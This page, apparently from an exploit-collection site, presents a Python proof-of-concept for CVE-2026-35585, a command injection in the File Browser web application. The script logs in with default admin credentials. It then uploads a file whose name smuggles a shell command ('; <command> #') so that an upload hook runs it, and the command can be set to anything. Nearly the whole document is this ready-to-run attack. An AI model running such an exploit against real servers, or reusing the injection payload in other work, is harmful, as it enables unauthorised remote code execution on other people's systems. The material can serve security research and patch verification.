5465 Total CVEs
26 Years
GitHub
Home / 2026 / CVE-2026-35585
README.md
Rendering markdown...
POC / exploit.py PY
⬇ Raw GitHub ✕ Close 
import requests
import argparse
import sys
import urllib.parse

# -------------------------------------------------------------------------
# CVE-2026-35585: File Browser OS Command Injection PoC
# This script is for educational purposes only.
# -------------------------------------------------------------------------

def get_args():
    parser = argparse.ArgumentParser(description="PoC for CVE-2026-35585 (File Browser RCE)")
    parser.add_argument("-t", "--target", required=True, help="Target URL (e.g., http://localhost:8080)")
    parser.add_argument("-u", "--user", default="admin", help="Username")
    parser.add_argument("-p", "--password", default="admin", help="Password")
    parser.add_argument("-c", "--command", default="touch /tmp/pwned", help="Command to execute")
    return parser.parse_args()

def exploit():
    args = get_args()
    base_url = args.target.rstrip('/')
    session = requests.Session()

    print(f"[*] Targeting: {base_url}")

    # 1. Authenticate and get JWT token
    login_url = f"{base_url}/api/login"
    login_data = {
        "username": args.user,
        "password": args.password
    }
    
    try:
        print("[*] Attempting to login...")
        res = session.post(login_url, json=login_data)
        if res.status_code != 200:
            print(f"[-] Login failed (Status: {res.status_code}). Check credentials.")
            return

        token = res.text.strip('"') # File Browser returns JWT as a quoted string
        session.headers.update({"X-Auth": token})
        print("[+] Login successful.")

    except Exception as e:
        print(f"[-] Error during login: {e}")
        return

    # 2. Prepare Payload (Malicious Filename)
    # The payload uses shell metacharacters to break out of the intended command.
    # Logic: ; <command> #
    payload_filename = f"; {args.command} #"
    
    # URL-encode the filename to prevent it from being interpreted as a path or directory
    encoded_filename = urllib.parse.quote(payload_filename, safe='')
    upload_url = f"{base_url}/api/resources/{encoded_filename}"

    # 3. Trigger Exploit via Upload
    try:
        print(f"[*] Triggering RCE by uploading file: '{payload_filename}'")
        print(f"[*] Encoded URL: {upload_url}")
        
        # An empty file is enough to trigger the 'after_upload' hook
        res = session.post(upload_url, data="poc_content")
        
        if res.status_code == 200:
            print("[+] Upload request successful.")
            print(f"[!] Command '{args.command}' should have been executed if hooks are enabled.")
        else:
            print(f"[-] Upload failed (Status: {res.status_code}).")
            print("    Note: Some characters might be blocked if 'Filename validation' is active.")

    except Exception as e:
        print(f"[-] Error during exploit: {e}")

if __name__ == "__main__":
    exploit()